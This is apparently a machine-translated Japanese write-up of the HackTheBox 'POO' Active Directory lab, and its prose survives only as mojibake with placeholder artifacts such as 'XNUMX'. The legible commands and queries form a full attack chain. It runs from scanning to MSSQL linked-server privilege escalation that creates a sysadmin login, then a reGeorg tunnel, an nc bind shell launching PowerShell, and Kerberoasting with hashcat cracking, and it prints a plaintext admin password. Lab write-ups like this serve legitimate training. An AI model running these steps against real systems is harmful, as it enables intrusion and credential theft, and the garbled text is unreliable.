ãã®èšäºã§ã¯ãæ©æ¢°ã ãã§ãªããçŸå Žããã®ããå®éšå®€å
šäœã®ééãåæããŸã
説æã«èšèŒãããŠããããã«ãPOO ã¯ãå°èŠæš¡ãª Active Directory ç°å¢ã§ã®æ»æã®ãã¹ãŠã®æ®µéã§ã¹ãã«ããã¹ãããããã«èšèšãããŠããŸãã ç®æšã¯ãããã»ã¹å 㧠5 ã€ã®ãã©ã°ãåéããããšã§ãã¢ã¯ã»ã¹å¯èœãªãã¹ãã䟵害ããæš©éãææ Œãããæçµçã«ã¯ãã¡ã€ã³å šäœã䟵害ããããšã§ãã
ç 究宀ãžã®æ¥ç¶ã¯VPNçµç±ã§ãã æ å ±ã»ãã¥ãªãã£ã«ã€ããŠããçšåºŠç¥ã£ãŠãã人ã ãšã®ãã©ã€ããŒã ãããã¯ãŒã¯ã«æ¥ç¶ããããšã«ãªãããã皌åäžã®ã³ã³ãã¥ãŒã¿ãéèŠãªããŒã¿ãä¿åãããŠãããã¹ãããã¯æ¥ç¶ããªãããšããå§ãããŸã ð
çµç¹æ
å ±
æ°ããèšäºããœãããŠã§ã¢ããã®ä»ã®æ
å ±ãç¥ãããšãã§ããããã«ã
ãã¹ãŠã®æ
å ±ã¯æè²ç®çã®ã¿ã«æäŸãããŸãã ãã®ææžã®äœæè
ã¯ããã®ææžãåŠç¿ããçµæåŸãããç¥èãæ¹æ³ã䜿çšããçµæã誰ãã«çããæ害ã«ã€ããŠã¯äžåã®è²¬ä»»ãè² ããŸããã
ã€ã³ãã
ãã®ãšã³ãã²ãŒã 㯠5 å°ã®ãã·ã³ã§æ§æãããXNUMX ã€ã®ãã©ã°ãå«ãŸããŠããŸãã
䜿çšå¯èœãªãã¹ãã®èª¬æãšã¢ãã¬ã¹ã瀺ãããŸãã
ããå§ããŸãããïŒ
åµå¯æ
ãã®ãã·ã³ã® IP ã¢ãã¬ã¹ã¯ 10.13.38.11 ã§ãããã /etc/hosts ã«è¿œå ããŸãã
10.13.38.11 poo.htb
æåã®ã¹ãããã¯ãéããŠããããŒããã¹ãã£ã³ããããšã§ãã nmapã§å šããŒããã¹ãã£ã³ãããšæéããããã®ã§ããŸãã¯masscanã§ã¹ãã£ã³ããŠã¿ãŸãã tun0 ã€ã³ã¿ãŒãã§ã€ã¹ãããã¹ãŠã® TCP ããŒããš UDP ããŒãã 500pps ã§ã¹ãã£ã³ããŸãã
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
ããã§ãããŒãäžã§å®è¡ãããŠãããµãŒãã¹ã«é¢ãã詳现æ
å ±ãååŸããããã«ã-A ãªãã·ã§ã³ã䜿çšããŠã¹ãã£ã³ãå®è¡ããŠã¿ãŸãããã
nmap -A poo.htb -p80,1433
ãããã£ãŠãIIS ãµãŒãã¹ãš MSSQL ãµãŒãã¹ãååšããŸãã ãã®å Žåããã¡ã€ã³ãšã³ã³ãã¥ãŒã¿ã®å®éã® DNS åã調ã¹ãŸãã Web ãµãŒããŒã§ã¯ãIIS ããŒã ããŒãžã衚瀺ãããŸãã
ãã£ã¬ã¯ããªãç¹°ãè¿ãåŠçããŠã¿ãŸãããã ããã«ã¯ãŽãã¹ã¿ãŒã䜿ããŸãã ãã©ã¡ãŒã¿ã§ã¯ãã¹ããªãŒã 128 (-t)ãURL (-u)ãèŸæž (-w)ãããã³é¢å¿ã®ããæ¡åŒµå (-x) ã®æ°ãæå®ããŸãã
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
ãããã£ãŠã/admin ãã£ã¬ã¯ããªã«å¯Ÿãã HTTP èªèšŒãšã.DS_Store ãã¹ã¯ããã ãµãŒãã¹ ã¹ãã¬ãŒãž ãã¡ã€ã«ãå©çšå¯èœã«ãªããŸãã .DS_Store ã¯ããã¡ã€ã«ã®ãªã¹ããã¢ã€ã³ã³ã®å Žæãéžæããèæ¯ç»åãªã©ããã©ã«ããŒã®ãŠãŒã¶ãŒèšå®ãä¿åãããã¡ã€ã«ã§ãã ãã®ãããªãã¡ã€ã«ã¯ãWeb éçºè
ã® Web ãµãŒã㌠ãã£ã¬ã¯ããªã«ä¿åãããå¯èœæ§ããããŸãã ãããã£ãŠããã£ã¬ã¯ããªã®å
容ã«é¢ããæ
å ±ãååŸããŸãã ãã®ããã«äœ¿çšã§ããŸã
python3 dsstore_crawler.py -i http://poo.htb/
ãã£ã¬ã¯ããªã®å
容ãååŸããŸãã ããã§æãèå³æ·±ãã®ã¯ /dev ãã£ã¬ã¯ããªã§ããããã 6 ã€ã®ãã©ã³ãã«ãœãŒã¹ ãã¡ã€ã«ãš db ãã¡ã€ã«ã衚瀺ãããŸãã ãã ãããµãŒãã¹ã IIS ShortName ã«å¯ŸããŠè匱ã§ããå Žåã¯ããã¡ã€ã«åãšãã£ã¬ã¯ããªåã®æåã® XNUMX æåã䜿çšã§ããŸãã 次ã䜿çšããŠãã®è匱æ§ã確èªã§ããŸã
ãããŠããpoo_coãã§å§ãŸãããã¹ã ãã¡ã€ã«ã XNUMX ã€èŠã€ãããŸãã 次ã«äœãããã°ããã®ãåããããåã«ãã£ã¬ã¯ããªã®èŸæžãããcoãã§å§ãŸããã¹ãŠã®åèªãéžæããŸããã
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
ãã㊠wfuzz ãç¹°ãè¿ããŸãã
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
ãããŠãé©åãªèšèãèŠã€ããŠãã ããïŒ ãã®ãã¡ã€ã«ã確èªããè³æ Œæ
å ±ãä¿åããŸã (DBNAME ãã©ã¡ãŒã¿ãŒããå€æãããšãè³æ Œæ
å ±ã¯ MSSQL ããã®ãã®ã§ã)ã
æãææž¡ãã20ïŒ
åé²ããŸãã
ãããã©ã°
MSSQL ã«æ¥ç¶ããDBeaver ã䜿çšããŸãã
ãã®ããŒã¿ããŒã¹ã«ã¯èå³æ·±ããã®ãäœãèŠã€ãããŸãããSQL ãšãã£ã¿ãŒãäœæããŠãŠãŒã¶ãŒãäœã§ãããã確èªããŠã¿ãŸãããã
SELECT name FROM master..syslogins;
ãŠãŒã¶ãŒã¯ XNUMX 人ããŸãã æš©éã確èªããŠã¿ãŸãããã
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
ãããã£ãŠãç¹æš©ã¯ãããŸããã ãªã³ã¯ããããµãŒããŒãèŠãŠã¿ãŸãããããã®ãã¯ããã¯ã«ã€ããŠè©³ããæžããŸãã
SELECT * FROM master..sysservers;
ããã§ãå¥ã® SQL Server ãèŠã€ããŸãã openquery() ã䜿çšããŠããã®ãµãŒããŒã§ã®ã³ãã³ãã®å®è¡ã確èªããŠã¿ãŸãããã
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
ããã«ãã¯ãšãª ããªãŒãæ§ç¯ããããšãã§ããŸãã
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
å®éããªã³ã¯ ãµãŒããŒã«ãªã¯ãšã¹ããè¡ããšããã®ãªã¯ãšã¹ãã¯å¥ã®ãŠãŒã¶ãŒã®ã³ã³ããã¹ãã§å®è¡ãããŸãã ãªã³ã¯ ãµãŒããŒäžã§ã©ã®ãããªãŠãŒã¶ãŒ ã³ã³ããã¹ããå®è¡ããŠããããèŠãŠã¿ãŸãããã
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
次ã«ããªã³ã¯ããããµãŒããŒããç§ãã¡ã®ãµãŒããŒãžã®ãªã¯ãšã¹ããã©ã®ãããªã³ã³ããã¹ãã§å®è¡ãããããèŠãŠã¿ãŸãããã
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
ãããã£ãŠãããã¯ãã¹ãŠã®æš©éãå¿
èŠãª DBO ã³ã³ããã¹ãã§ãã ãªã³ã¯ãµãŒããŒããã®ãªã¯ãšã¹ãã®å Žåã®æš©éã確èªããŠã¿ãŸãããã
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
ã芧ã®ãšãããç§ãã¡ã«ã¯ãã¹ãŠã®ç¹æš©ããããŸãã ãã®ããã«ç®¡çè
ãäœæããŸãããã ãã ããopenquery ã䜿çšããããšã¯ã§ããŸãããEXECUTE AT ã䜿çšããŠå®è¡ããŸãããã
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
次ã«ãæ°ãããŠãŒã¶ãŒã®è³æ Œæ å ±ã䜿çšããŠæ¥ç¶ããæ°ãããã©ã° ããŒã¿ããŒã¹ã芳å¯ããŸãã
ãã®æãæž¡ããŠããã«é²ãã§ãããŸãã
ããã¯ãã©ãã¯ãã©ã°
MSSQL ã䜿çšããŠã·ã§ã«ãååŸããŸããããç§ã¯ impacket ããã±ãŒãžã® mssqlclient ã䜿çšããŠããŸãã
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
ãã¹ã¯ãŒããååŸããå¿
èŠããããŸãããæåã«ãã§ã«åºäŒã£ãŠããã®ã¯ãµã€ãã§ãã ãããã£ãŠãWeb ãµãŒããŒã®èšå®ãå¿
èŠã§ã (䟿å©ãªã·ã§ã«ãã¹ããŒããããšã¯äžå¯èœã§ãããã¡ã€ã¢ãŠã©ãŒã«ãæ©èœããŠããããã§ã)ã
ããããã¢ã¯ã»ã¹ã¯æåŠãããŸãã MSSQL ãããã¡ã€ã«ãèªã¿åãããšã¯ã§ããŸãããå¿
èŠãªã®ã¯ãã©ã®ãããªããã°ã©ãã³ã°èšèªãæ§æãããŠããããç¥ãããšã ãã§ãã ãããŠãMSSQL ãã£ã¬ã¯ããªã« Python ãããããšãããããŸãã
ãã®åŸãweb.config ãã¡ã€ã«ãèªã¿åãã®ã«åé¡ã¯ãããŸããã
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
è³æ Œæ
å ±ãèŠã€ãã£ããã/admin ã«ç§»åããŠãã©ã°ãéžæããŸãã
è¶³å Žãã©ã°
å®éããã¡ã€ã¢ãŠã©ãŒã«ã䜿çšãããšäžäŸ¿ãªç¹ããããŸããããããã¯ãŒã¯èšå®ãèŠãŠã¿ããšãIPv6 ãããã³ã«ã䜿çšãããŠããããšãããããŸãã
ãã®ã¢ãã¬ã¹ã /etc/hosts ã«è¿œå ããŸãã
dead:babe::1001 poo6.htb
ããäžåºŠãã¹ããã¹ãã£ã³ããŠã¿ãŸãããããã ããä»å㯠IPv6 çµç±ã§ãã
ãŸããWinRM ãµãŒãã¹ã¯ IPv6 çµç±ã§å©çšã§ããŸãã èŠã€ãã£ãèªèšŒæ
å ±ã䜿çšããŠæ¥ç¶ããŸãããã
ãã¹ã¯ãããã«æãããã®ã§ããããæž¡ããŸãã
P00ããããã©ã°
ãã¹ããåµå¯ããåŸã
setspn.exe -T intranet.poo -Q */*
MSSQL çµç±ã§ã³ãã³ããå®è¡ããŠã¿ãŸãããã
ãã®ããã«ããŠããŠãŒã¶ãŒ p00_hr ãš p00_adm ã® SPN ãååŸããŸããããã¯ããããã®ãŠãŒã¶ãŒã Kerberoasting ãªã©ã®æ»æã«å¯ŸããŠè匱ã§ããããšãæå³ããŸãã ã€ãŸãããã¹ã¯ãŒãã®ããã·ã¥ãååŸã§ããŸãã
ãŸããMSSQL ãŠãŒã¶ãŒã«ä»£ãã£ãŠå®å®ããã·ã§ã«ãååŸããå¿
èŠããããŸãã ãã ããã¢ã¯ã»ã¹ãå¶éãããŠããããããã¹ããšã®æ¥ç¶ã¯ããŒã 80 ãš 1433 çµç±ã§ã®ã¿è¡ãããŸãã ãã ããããŒã 80 ãä»ããŠãã©ãã£ãã¯ããã³ããªã³ã°ããããšã¯å¯èœã§ãã ãã®ããã«ç§ãã¡ã¯äœ¿çšããŸã
ããããã¢ã¯ã»ã¹ããããšãããš 404 ãšã©ãŒãçºçãã*.aspx ãã¡ã€ã«ãå®è¡ãããªãããšãæå³ããŸãã ãããã®æ¡åŒµåã®ãã¡ã€ã«ãå®è¡ããã«ã¯ã次ã®ããã« ASP.NET 4.5 ãã€ã³ã¹ããŒã«ããŸãã
dism /online /enable-feature /all /featurename:IIS-ASPNET45
ãããŠãtunnel.aspx ã«ã¢ã¯ã»ã¹ãããšããã¹ãŠã®æºåãã§ããŠãããšããçããåŸãããŸãã
ãã©ãã£ãã¯ãäžç¶ããã¢ããªã±ãŒã·ã§ã³ã®ã¯ã©ã€ã¢ã³ãéšåãèµ·åããŸãããã ããŒã 5432 ããã®ãã¹ãŠã®ãã©ãã£ãã¯ããµãŒããŒã«è»¢éããŸãã
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
ãŸãããããã·ãã§ãŒã³ã䜿çšããŠããããã·çµç±ã§ã¢ããªã±ãŒã·ã§ã³ã®ãã©ãã£ãã¯ãéä¿¡ããŸãã ãã®ãããã·ã /etc/proxychains.conf èšå®ãã¡ã€ã«ã«è¿œå ããŸãããã
ããã§ã¯ãããã°ã©ã ããµãŒããŒã«ã¢ããããŒãããŸããã
ããã§ãMSSQL ãéããŠãªã¹ããŒãèµ·åããŸãã
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
ãããŠããããã·ãä»ããŠæ¥ç¶ããŸãã
proxychains rlwrap nc poo.htb 4321
ãããŠããã·ã¥ãååŸããŸãããã
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
次ã«ããããã®ããã·ã¥ãå埩åŠçããå¿
èŠããããŸãã Rockyou ã«ã¯ãã¹ã¯ãŒã ããŒã¿èŸæžããªãã£ããããSeclists ã§æäŸãããŠãããã¹ãŠã®ãã¹ã¯ãŒãèŸæžã䜿çšããŸããã åæã«ã¯ hashcat ã䜿çšããŸãã
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
ãããŠãäž¡æ¹ã®ãã¹ã¯ãŒããèŠã€ãããŸããæåã®ãã¹ã¯ãŒã㯠dutch_passwordlist.txt èŸæžã«ãããXNUMX çªç®ã®ãã¹ã¯ãŒã㯠Keyboard-Combinations.txt ã«ãããŸãã
ãŠãŒã¶ãŒã XNUMX 人ããã®ã§ããã¡ã€ã³ ã³ã³ãããŒã©ãŒã«ç§»åããŸãã ãŸãã¯åœŒã®äœæã調ã¹ãŠã¿ãŸãããã
ãã¡ã€ã³ ã³ã³ãããŒã©ãŒã® IP ã¢ãã¬ã¹ãããããŸããã ãã¡ã€ã³ã®ãã¹ãŠã®ãŠãŒã¶ãŒãšããã®ãã¡ã®èª°ã管çè
ã§ãããã調ã¹ãŠã¿ãŸãããã æ
å ±ãååŸããã¹ã¯ãªãã PowerView.ps1 ãããŠã³ããŒãããŸãã 次ã«ã-s ãã©ã¡ãŒã¿ã«ã¹ã¯ãªããã®ãããã£ã¬ã¯ããªãæå®ããŠãevil-winrm ã䜿çšããŠæ¥ç¶ããŸãã ãããŠãPowerView ã¹ã¯ãªãããããŒãããã ãã§ãã
ããã§ããã®ãã¹ãŠã®æ©èœã«ã¢ã¯ã»ã¹ã§ããããã«ãªããŸããã p00_adm ãŠãŒã¶ãŒã¯ç¹æš©ãŠãŒã¶ãŒã®ããã«èŠããããããã®ã³ã³ããã¹ãã§äœæ¥ããŸãã ãã®ãŠãŒã¶ãŒã® PSCredential ãªããžã§ã¯ããäœæããŸãããã
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
ããã§ãCreds ãæå®ãããã¹ãŠã® Powershell ã³ãã³ãã p00_adm ã«ä»£ãã£ãŠå®è¡ãããããã«ãªããŸãã ãŠãŒã¶ãŒã®ãªã¹ããš AdminCount å±æ§ã衚瀺ããŠã¿ãŸãããã
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
ãããã£ãŠãç§ãã¡ã®ãŠãŒã¶ãŒã¯æ¬åœã«æµãŸããŠããŸãã 圌ãã©ã®ã°ã«ãŒãã«å±ããŠããããèŠãŠã¿ãŸãããã
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
æåŸã«ããŠãŒã¶ãŒããã¡ã€ã³ç®¡çè
ã§ããããšã確èªããŸãã ããã«ããããã¡ã€ã³ ã³ã³ãããŒã©ãŒã«ãªã¢ãŒãã§ãã°ãªã³ããæš©å©ãäžããããŸãã ãã³ãã«ã䜿çšã㊠WinRM ã§ãã°ã€ã³ããŠã¿ãŸãããã evil-winrm ã䜿çšãããšãã« reGeorg ã«ãã£ãŠçºè¡ããããšã©ãŒã«æ··ä¹±ããŸããã
次ã«ãå¥ã®ããç°¡åãªæ¹æ³ã䜿çšããŸãã
ç§ãã¡ã¯æ¥ç¶ããããšããŸãããç§ãã¡ã¯ã·ã¹ãã å
ã«ããŸãã
ãããæããªãã 次ã«ããŠãŒã¶ãŒãèŠãŠãã¹ã¯ãããã確èªããŸãã
mr3ks ã§ãã©ã°ãèŠã€ããç 究æ㯠100% å®æããŸããã
ããã§å
šéšã§ãã ãã£ãŒãããã¯ãšããŠããã®èšäºããäœãæ°ããããšãåŠãã ãã©ããã圹ã«ç«ã£ããã©ããã«ã€ããŠã³ã¡ã³ãããŠãã ããã
ããåå ã§ããŸã
åºæïŒ habr.com